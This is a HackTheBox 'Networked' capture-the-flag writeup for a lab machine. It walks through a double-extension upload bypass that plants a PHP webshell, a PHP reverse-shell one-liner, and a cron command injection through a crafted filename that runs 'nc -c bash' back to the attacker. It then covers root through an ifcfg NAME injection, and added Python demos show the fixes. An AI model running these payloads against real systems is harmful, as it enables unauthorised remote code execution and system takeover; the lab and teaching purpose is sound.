HackTheBox — Networked Writeup (OSCP Like)

ZeusCybersec, published in InfoSec Write-ups, Nov 8, 2022 (9 min read)


Networked is a Medium-level, OSCP-like Linux machine on HackTheBox. The challenging parts are reading the PHP source to work out how to get a shell, and the privilege escalation, which relies on an unusual and uncommon technique.

Enumeration

We find ports 22 (SSH) and 80 (HTTP) open. This is the default page served on port 80.

Let's brute-force directories on the web server on port 80 with dirsearch. We find /uploads and /backup.

Let's visit /backup.

It looks like an archive. We confirm this with the file command: it is a POSIX tar archive (plain tar, not compressed).

Let's look up how to extract a tar archive; Stack Overflow gives the usual command (x = extract, v = verbose, f = archive file):

COMMAND → tar xvf filename.tar

Once you have unpacked the backup you will find the PHP source of the site's pages, including photos.php, upload.php and lib.php. Let's look at photos.php.

Let's look at upload.php. It looks like we can upload files here, so hopefully we can bypass the upload filter and execute commands.

Before uploading anything malicious, I tried uploading a plain image file.

When I visit photos.php I can see the image I uploaded.

I right-clicked the image and opened it in a new tab to find its location: it is stored in the /uploads folder.

LET'S TRY SOME FILE UPLOAD BYPASSES! I tried many ways, and the one that worked was saving the reverse shell with a double extension, .php.jpg. The name ends with .jpg, so the upload filter accepts it as an image, but because of the .php in the name Apache on this box still hands the file to the PHP handler (mod_mime treats every dot-separated suffix as an extension), so it gets executed as PHP.

BONUS TIP: If you read upload.php you can see which extensions are allowed.

Anyway, let's intercept the upload request in Burp and send it to Repeater. In the body of the request you will see some garbage-looking values: this is the image data. We will not remove it, because it is what makes the target believe we are uploading an image. Now go to the last line of the file data and append the PHP code:

<?php system($_GET['cmd']); ?>

You can see that our file was uploaded successfully.

Along with this, make sure the filename ends with .php.jpg, as you can see on line 15 of the request. This is what gets our file executed as PHP.

See line 15: filename=poison.php.jpg

Let's visit photos.php, right-click our image and open it in a new tab.

We can see the data inside our image: the garbage image bytes, followed by our PHP.

BONUS TIP: We could have avoided all this garbage. Instead of keeping the image data in front of our PHP code, we could have put just a magic-byte signature such as GIF87a at the start, which is enough for the target's image check to treat the upload as a GIF. I'll just show you an image of what I mean.

GIF87a is the magic signature of a GIF. Magic bytes are the first bytes of a file that let programs (the file command, PHP's fileinfo) identify its type. Just google "magic bytes of gif".

In the URL we add ?cmd=whoami, which makes the webshell run the whoami command through system().

Now scroll down and you will see apache, which I have highlighted in blue. So PHP is running as the apache user.

Let's replace the whoami command with something more useful: a PHP reverse shell one-liner, which you can find on pentestmonkey's reverse shell cheat sheet (replace 10.0.0.1 and 1234 with your own listener's IP and port):

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

MAKE SURE TO URL ENCODE IT! (Otherwise it won't work: the & in <&3 >&3 2>&3 would end the cmd parameter, and the spaces and quotes would be mangled.)

?cmd=<paste your URL-encoded PHP reverse shell here>

With a listener waiting on that port, we finally get a shell. By the way, what I did via the URL could also be done through Burp Suite.

Let's transfer linpeas to the target.

PRIVILEGE ESCALATION

OVERVIEW: This part requires that you know how to read code. Unfortunately I didn't have much experience reading PHP code, so I would highly suggest you refer to ippsec's video. The explanation I am going to provide for this part has been taken from Rana Khalil's writeup, where it is well explained (credits: https://ranakhalil101.medium.com/hack-the-box-networked-writeup-w-o-metasploit-62daa1146b9b).

Apache > Guly

The user.txt flag is in the home directory of the user guly. So we’ll either have to escalate our privileges to guly or root.

I ran LinEnum.sh and pspy64 but didn't find anything unusual. I did notice that in guly's home directory there is a PHP script and a crontab file, and we have read permission on both of them.

bash-4.2$ ls -la
total 28
drwxr-xr-x. 2 guly guly 159 Jul 9 2019 .
drwxr-xr-x. 3 root root 18 Jul 2 2019 ..
lrwxrwxrwx. 1 root root 9 Jul 2 2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
-rw------- 1 guly guly 639 Jul 9 2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
-r--------. 1 guly guly 33 Oct 30 2018 user.txt

View the content of crontab.guly.

bash-4.2$ cat crontab.guly 
*/3 * * * * php /home/guly/check_attack.php

It runs the check_attack.php script every 3 minutes (the */3 in the minute field). If you're not familiar with the crontab format, refer to the following link.

Let’s view the check_attack.php file.

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
  $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";
  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}
?>

The script lists every file in /var/www/html/uploads (the preg_grep skips dotfiles, and index.html is skipped explicitly) and runs getnameCheck() and check_ip() from lib.php on each one.

function getnameCheck($filename) {
  $pieces = explode('.',$filename);
  $name= array_shift($pieces);
  $name = str_replace('_','.',$name);
  $ext = implode('.',$pieces);
  #echo "name $name - ext $ext\n";
  return array($name,$ext);
}

function check_ip($prefix,$filename) {
  //echo "prefix: $prefix - fname: $filename<br>\n";
  $ret = true;
  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
    $ret = false;
    $msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";
  } else {
    $msg = $filename;
  }
  return array($ret,$msg);
}

getnameCheck() splits the filename at the first dot: what comes before it is the name (with underscores turned back into dots) and everything after it is the extension. check_ip() checks whether that name is a valid IP address. If it is not, it returns false, which triggers the attack branch in check_attack.php:

if (!($check[0])) {
  echo "attack!\n";
  # todo: attach file
  file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

  exec("rm -f $logpath");
  exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
  echo "rm -f $path$value\n";
  mail($to, $msg, $msg, $headers, "-F$value");
}

This builds the rm command line by concatenating the upload path and the raw filename into a string and passes it to exec(), which runs it through /bin/sh. The filename is neither validated nor quoted, so shell metacharacters in a filename we create in that directory are interpreted by the shell, and because the cron job runs as guly we can abuse this to escalate privileges.

Change to the /var/www/html/uploads directory and create a file with the following name:

touch '; nc -c bash 10.10.14.12 3333'

The ";" terminates the rm command inside the exec() string, and the rest of the name runs nc, which sends a reverse shell back to our machine. Any filename whose part before the first dot is not a valid IP address (and which does not start with a dot) hits this branch, so this one will be picked up on the next run.

Set up a listener to receive the reverse shell.

nc -nlvp 3333

Wait for the cron job to run and we get a shell!

Convert the shell to a fully interactive shell and grab the user.txt flag.
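The command injection above, reproduced as an added example in Python (not code from the box or the writeup): it models check_ip() with the ipaddress module to show which filenames reach the rm branch, runs the vulnerable exec() string through /bin/sh against a scratch uploads directory using a harmless filename ("; touch marker" instead of "; nc -c bash ..."), and shows the hardened form that passes the path as a single argument without a shell. The marker file name and the scratch directory are constructed for the demo, and the nohup/& backgrounding is dropped so the result can be checked synchronously.

```python
"""
Added example (not code from the box or the writeup): reproduce the exec()
pattern from check_attack.php in a scratch directory to show why a crafted
filename runs a command, then the hardened form, plus a Python model of the
check_ip() gate that decides which files reach that branch.

Assumptions: PHP's exec() hands its string to /bin/sh -c, which
subprocess.run(..., shell=True) models; the injected command here just
creates a marker file (the writeup's real payload is the nc reverse shell);
the "nohup ... &" backgrounding is dropped so the outcome is synchronous.
"""
import ipaddress
import os
import subprocess
import tempfile

MARKER = "injected.marker"      # created by the injected command (constructed)


def getname_check(filename: str):
    """lib.php getnameCheck(): split at the first dot, '_' -> '.' in the name."""
    name, _, ext = filename.partition(".")
    return name.replace("_", "."), ext


def is_attack(filename: str) -> bool:
    """check_ip() flags a file as an attack unless its name part is a valid
    IP. So '10_10_14_12.php.jpg' is left alone; anything else gets rm'ed."""
    name, _ = getname_check(filename)
    try:
        ipaddress.ip_address(name)
        return False
    except ValueError:
        return True


def vulnerable_delete(path: str, value: str, cwd: str) -> None:
    """Mirrors exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"):
    the filename is interpolated unquoted into a shell command line, so the
    ';' in a hostile name ends rm and starts a second command."""
    subprocess.run(f"/bin/rm -f {path}{value} > /dev/null 2>&1",
                   shell=True, cwd=cwd, stderr=subprocess.DEVNULL)


def hardened_delete(path: str, value: str, cwd: str) -> None:
    """Fix: no shell at all. The path is one argv element, and '--' stops a
    name beginning with '-' from being parsed as an rm option."""
    subprocess.run(["/bin/rm", "-f", "--", path + value], cwd=cwd)


def run_cron_pass(delete):
    """Run one cron-style pass with a hostile upload name.
    Returns (injected_command_ran, upload_was_removed)."""
    with tempfile.TemporaryDirectory() as work:
        uploads = os.path.join(work, "uploads") + "/"   # $path keeps its trailing '/'
        os.mkdir(uploads)
        value = f"; touch {MARKER}"                      # like touch '; nc -c bash ...'
        if not is_attack(value):                         # it must take the rm branch
            raise RuntimeError("name would not trigger the attack branch")
        upload = uploads + value
        open(upload, "w").close()
        delete(uploads, value, work)
        return (os.path.exists(os.path.join(work, MARKER)),
                not os.path.exists(upload))


if __name__ == "__main__":
    print("vulnerable:", run_cron_pass(vulnerable_delete))   # (True, False)
    print("hardened:  ", run_cron_pass(hardened_delete))     # (False, True)
```

In the vulnerable pass rm is handed the directory path and fails quietly, the injected command runs, and the hostile file is never removed, which is exactly why the real payload survives long enough for cron to keep executing it; in the hardened pass the file is simply deleted. Note that a filename cannot contain "/", so the injected command has to be something reachable by name or a relative path, which the nc one-liner in the writeup satisfies.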

Guly > Root (ifcfg privilege escalation)

We need to escalate our privileges to root. I downloaded the LinEnum script and ran it. It looks like we can run the following script as root with sudo, without a password.

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
[+] Possible sudo pwnage!
/usr/local/sbin/changename.sh

View the permissions on the file.

[guly@networked ~]$ ls -la /usr/local/sbin | grep changename.sh
-rwxr-xr-x 1 root root 422 Jul 8 2019 changename.sh

We only have read and execute permissions on the file, so we cannot simply edit it. Let's view its contents.

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
  echo "interface $var:"
  read x
  while [[ ! $x =~ $regexp ]]; do
    echo "wrong input, try again"
    echo "interface $var:"
    read x
  done
  echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

The script writes a fixed header to /etc/sysconfig/network-scripts/ifcfg-guly, then prompts for NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO. Each answer is checked against a regex that allows only letters, digits, underscore, space, slash and hyphen, and is appended to the file as an unquoted VAR=value line; finally ifup brings the interface up. Let's view the permissions on that file.

[guly@networked ~]$ ls -la /etc/sysconfig/network-scripts/ | grep ifcfg-guly
-rw-r--r-- 1 root root 114 Jan 14 04:09 ifcfg-guly

We can only read it. Let's view the file.

DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=ps /tmp/foo
PROXY_METHOD=asodih
BROWSER_ONLY=asdoih
BOOTPROTO=asdoih

The NAME attribute already holds a system command (ps /tmp/foo), so we can probably use this to escalate privileges. After a bit of googling, I found the bug report which states that incorrect whitespace filtering on the NAME attribute leads to code execution. The reason is that the network scripts source the ifcfg file as shell, so an unquoted line like NAME=guly bash is parsed by the shell as "run bash with NAME=guly in its environment". The regex in changename.sh lets a space through, and since we run the script as root via sudo, whatever follows the space is executed as root. Here are some more resources about ifcfg privilege escalation. It is a very obscure method of privesc.

As you can see above, when prompted for the NAME field we can enter any valid value, then a space, followed by the command we want to run. In our example we ran bash and got a root shell.

Grab the root.txt flag.
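Why the regex is not a defence, as an added example in Python (not code from the box or the writeup): it applies the same bracket expression as changename.sh to a NAME value, writes the file the way the script does (unquoted echo $var=$x), then sources it with /bin/sh the way the network scripts source ifcfg files (they use bash; the parsing is identical for this case), with "touch pwned" standing in for bash as the payload. A quoted writer shows the fix. The scratch directory and the marker file are constructed for the demo.

```python
"""
Added example (not code from the box or the writeup): why the regex in
changename.sh is not enough. The script writes each answer as an unquoted
VAR=value line into ifcfg-guly, and the network scripts later source that
file as shell, where 'NAME=guly bash' parses as "run bash with NAME=guly in
its environment". Here the payload is 'touch pwned' instead of bash, the file
is sourced with /bin/sh (the real scripts are bash; the parsing is the same
here), and a quoted writer shows the fix. Scratch paths are constructed.
"""
import os
import re
import shlex
import subprocess
import tempfile

# Same bracket expression as changename.sh: letters, digits, '_', a literal
# backslash and space, '/', '-'. A space is allowed; ';', '|', '$' are not.
REGEXP = re.compile(r"^[a-zA-Z0-9_\\ /-]+$")


def passes_check(value: str) -> bool:
    """The while-loop in changename.sh accepts the value iff this matches."""
    return REGEXP.match(value) is not None


def write_ifcfg(path: str, values: dict, quoted: bool = False) -> None:
    """What changename.sh does: fixed header, then `echo $var=$x >> file`.
    With quoted=True the value is shell-quoted, so sourcing it later is a
    plain assignment instead of a command."""
    with open(path, "w") as f:
        f.write("DEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\n")
        for var, x in values.items():
            f.write(f"{var}={shlex.quote(x) if quoted else x}\n")


def source_ifcfg(path: str, cwd: str) -> int:
    """Model of ifup: the network scripts source the ifcfg file as shell."""
    return subprocess.run(["/bin/sh", "-c", '. "$1"', "sh", path],
                          cwd=cwd).returncode


def try_name(name_value: str, quoted: bool = False):
    """Feed one NAME answer through the check, the file write and the sourcing.
    Returns (regex_accepted, command_executed)."""
    if not passes_check(name_value):
        return False, False
    with tempfile.TemporaryDirectory() as work:
        cfg = os.path.join(work, "ifcfg-guly")
        write_ifcfg(cfg, {"NAME": name_value, "PROXY_METHOD": "asodih",
                          "BROWSER_ONLY": "asdoih", "BOOTPROTO": "asdoih"},
                    quoted)
        source_ifcfg(cfg, work)
        return True, os.path.exists(os.path.join(work, "pwned"))


if __name__ == "__main__":
    for value, quoted in (("guly", False), ("guly; touch pwned", False),
                          ("guly touch pwned", False), ("guly touch pwned", True)):
        print(f"{value!r:22} quoted={quoted!s:5} -> {try_name(value, quoted)}")
```

The regex does block the obvious separators (";", "|", "$(...)"), which is why the classic injection attempt fails, but a bare space is enough because of how the file is consumed. Rejecting whitespace, or quoting the value when writing it (the quoted=True path), closes the hole; on the box the script is root-owned, so as guly the only option is to use it.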

CONCLUSION

Honestly this machine was challenging (it is also rated harder than OSCP on TJ Null's list) because it requires reading code and uses a weird method of privilege escalation. However, I found the privesc method interesting, as I had never seen it before. For more such writeups, make sure to follow me here on Medium. Until next time...


I am a penetration tester, currently pursuing OSCP, skilled in network pentesting and in developing security tools with Python. YouTube: ZeusCybersec